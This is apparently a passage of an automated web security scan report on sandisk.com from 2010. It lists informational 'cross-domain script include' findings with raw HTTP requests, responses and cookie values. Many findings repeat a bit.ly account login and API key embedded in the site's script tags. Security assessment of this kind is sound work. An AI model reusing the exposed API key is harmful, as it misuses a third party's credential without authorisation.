Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.7. http://www.sandisk.com/SanDisk/twitter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/SanDisk/twitter

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /SanDisk/twitter HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.8. http://www.sandisk.com/SanDisk/youtube previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/SanDisk/youtube

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /SanDisk/youtube HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.9. http://www.sandisk.com/about-sandisk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40542
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.10. http://www.sandisk.com/about-sandisk.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/sitemap
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40547
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.11. http://www.sandisk.com/about-sandisk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40543
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.12. http://www.sandisk.com/about-sandisk/careers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/careers

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/careers HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19631
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.13. http://www.sandisk.com/about-sandisk/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/careers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/careers/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19632
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.14. http://www.sandisk.com/about-sandisk/careers/benefits previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/careers/benefits

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/careers/benefits HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/careers
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28990
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.15. http://www.sandisk.com/about-sandisk/careers/career-opportunities previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/careers/career-opportunities

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/careers/career-opportunities HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/careers
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18318
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.16. http://www.sandisk.com/about-sandisk/careers/employment-practices previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/careers/employment-practices

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/careers/employment-practices HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/careers
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19354
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.17. http://www.sandisk.com/about-sandisk/careers/for-new-college-grads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/careers/for-new-college-grads

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/careers/for-new-college-grads HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/careers
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18058
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.18. http://www.sandisk.com/about-sandisk/contact-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/contact-us

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/contact-us HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

2.19. http://www.sandisk.com/about-sandisk/corporate-social-responsibility previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41763
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.20. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41764
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.21. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/community-engagement

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41952
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.22. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/community-engagement/

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41953
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.23. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/community-education previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/community-engagement/community-education

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement/community-education HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41456
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.24. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/community-sharing-program previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/community-engagement/community-sharing-program

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement/community-sharing-program HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement
